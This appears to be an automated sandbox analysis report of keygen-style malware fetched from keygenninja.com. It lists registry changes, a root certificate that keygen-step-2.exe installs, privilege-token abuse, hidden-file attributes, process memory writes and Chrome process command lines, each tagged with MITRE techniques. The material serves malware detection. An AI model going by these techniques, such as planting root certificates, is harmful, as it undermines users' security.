Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{E5B35BDD-4CA9-4A71-BA50-C9C70C9C057D} = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000038d4a8ce1a0233e94ac46dd76d9961ef78c609eb4e3b362bd7e8319845bceb3301ae2737c194e7ee62ac3c753401cdc3ab2e06350322bf842dd35737c81c8858bc2cd0ba6938f3a18c618a5e6474bbbf5afdcb25cb19e1ffd5fe	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

keygen-step-2.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	keygen-step-2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	keygen-step-2.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

4344 PING.EXE
3168 PING.EXE
2972 PING.EXE
4332 PING.EXE

pid	process
4344	PING.EXE
3168	PING.EXE
2972	PING.EXE
4332	PING.EXE

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	252	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	267	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	751	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	760	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exesetups.tmpkey.exemultitimer.exe

pid	process
3708	chrome.exe
3708	chrome.exe
4020	chrome.exe
4020	chrome.exe
5052	chrome.exe
5052	chrome.exe
4088	chrome.exe
4088	chrome.exe
2156	chrome.exe
2156	chrome.exe
3736	chrome.exe
3736	chrome.exe
4860	chrome.exe
4860	chrome.exe
3820	chrome.exe
3820	chrome.exe
4676	chrome.exe
4676	chrome.exe
1844	chrome.exe
1844	chrome.exe
1844	chrome.exe
1844	chrome.exe
2944	setups.tmp
2944	setups.tmp
2404	key.exe
2404	key.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe
3008	multitimer.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

MicrosoftEdgeCP.exe

pid process

4152 MicrosoftEdgeCP.exe
4152 MicrosoftEdgeCP.exe

pid	process
4152	MicrosoftEdgeCP.exe
4152	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Setup.exeaskinstall20.exemultitimer.exetaskkill.exeMicrosoftEdge.exeMicrosoftEdgeCP.exemultitimer.exekey.exe

description	pid	process
Token: SeDebugPrivilege	3472	Setup.exe
Token: SeCreateTokenPrivilege	2236	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	2236	askinstall20.exe
Token: SeLockMemoryPrivilege	2236	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	2236	askinstall20.exe
Token: SeMachineAccountPrivilege	2236	askinstall20.exe
Token: SeTcbPrivilege	2236	askinstall20.exe
Token: SeSecurityPrivilege	2236	askinstall20.exe
Token: SeTakeOwnershipPrivilege	2236	askinstall20.exe
Token: SeLoadDriverPrivilege	2236	askinstall20.exe
Token: SeSystemProfilePrivilege	2236	askinstall20.exe
Token: SeSystemtimePrivilege	2236	askinstall20.exe
Token: SeProfSingleProcessPrivilege	2236	askinstall20.exe
Token: SeIncBasePriorityPrivilege	2236	askinstall20.exe
Token: SeCreatePagefilePrivilege	2236	askinstall20.exe
Token: SeCreatePermanentPrivilege	2236	askinstall20.exe
Token: SeBackupPrivilege	2236	askinstall20.exe
Token: SeRestorePrivilege	2236	askinstall20.exe
Token: SeShutdownPrivilege	2236	askinstall20.exe
Token: SeDebugPrivilege	2236	askinstall20.exe
Token: SeAuditPrivilege	2236	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	2236	askinstall20.exe
Token: SeChangeNotifyPrivilege	2236	askinstall20.exe
Token: SeRemoteShutdownPrivilege	2236	askinstall20.exe
Token: SeUndockPrivilege	2236	askinstall20.exe
Token: SeSyncAgentPrivilege	2236	askinstall20.exe
Token: SeEnableDelegationPrivilege	2236	askinstall20.exe
Token: SeManageVolumePrivilege	2236	askinstall20.exe
Token: SeImpersonatePrivilege	2236	askinstall20.exe
Token: SeCreateGlobalPrivilege	2236	askinstall20.exe
Token: 31	2236	askinstall20.exe
Token: 32	2236	askinstall20.exe
Token: 33	2236	askinstall20.exe
Token: 34	2236	askinstall20.exe
Token: 35	2236	askinstall20.exe
Token: SeDebugPrivilege	4112	multitimer.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeDebugPrivilege	4656	MicrosoftEdge.exe
Token: SeDebugPrivilege	4656	MicrosoftEdge.exe
Token: SeDebugPrivilege	4656	MicrosoftEdge.exe
Token: SeDebugPrivilege	4656	MicrosoftEdge.exe
Token: SeDebugPrivilege	3936	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3936	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3936	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3936	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3008	multitimer.exe
Token: SeImpersonatePrivilege	2404	key.exe
Token: SeTcbPrivilege	2404	key.exe
Token: SeChangeNotifyPrivilege	2404	key.exe
Token: SeCreateTokenPrivilege	2404	key.exe
Token: SeBackupPrivilege	2404	key.exe
Token: SeRestorePrivilege	2404	key.exe
Token: SeIncreaseQuotaPrivilege	2404	key.exe
Token: SeAssignPrimaryTokenPrivilege	2404	key.exe
Token: SeImpersonatePrivilege	2404	key.exe
Token: SeTcbPrivilege	2404	key.exe
Token: SeChangeNotifyPrivilege	2404	key.exe
Token: SeCreateTokenPrivilege	2404	key.exe
Token: SeBackupPrivilege	2404	key.exe
Token: SeRestorePrivilege	2404	key.exe
Token: SeIncreaseQuotaPrivilege	2404	key.exe
Token: SeAssignPrimaryTokenPrivilege	2404	key.exe
Token: SeImpersonatePrivilege	2404	key.exe
Token: SeTcbPrivilege	2404	key.exe

Suspicious use of FindShellTrayWindow 12 IoCs

Processes:

chrome.exe

pid	process
4020	chrome.exe
4020	chrome.exe
4020	chrome.exe
4020	chrome.exe
4020	chrome.exe
4020	chrome.exe
4020	chrome.exe
4020	chrome.exe
4020	chrome.exe
4020	chrome.exe
4020	chrome.exe
4020	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

pid process

4656 MicrosoftEdge.exe
4152 MicrosoftEdgeCP.exe
4152 MicrosoftEdgeCP.exe

pid	process
4656	MicrosoftEdge.exe
4152	MicrosoftEdgeCP.exe
4152	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4020 wrote to memory of 3476	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 3476	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 2628	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 3708	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 3708	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe
PID 4020 wrote to memory of 4068	4020	chrome.exe	chrome.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

8120 attrib.exe
7452 attrib.exe
2680 attrib.exe
2552 attrib.exe

pid	process
8120	attrib.exe
7452	attrib.exe
2680	attrib.exe
2552	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenninja.com/
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffe18cf6e00,0x7ffe18cf6e10,0x7ffe18cf6e20
2⤵
PID:3476

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1568 /prefetch:2
2⤵
PID:2628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1636 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2176 /prefetch:8
2⤵
PID:4068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2788 /prefetch:1
2⤵
PID:3272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1
2⤵
PID:3164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2168 /prefetch:1
2⤵
PID:2020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
2⤵
PID:3760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
2⤵
PID:1448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
2⤵
PID:3996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4416 /prefetch:8
2⤵
PID:4180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5600 /prefetch:8
2⤵
PID:4256

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
2⤵
PID:4300

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6d23f7740,0x7ff6d23f7750,0x7ff6d23f7760
3⤵
PID:4336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1556,12885480128776150272,9729403592302703414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5408 /prefetch:8
2⤵
PID:4316

C:\Program Files\Google\Chrome\Application\chrome.exe
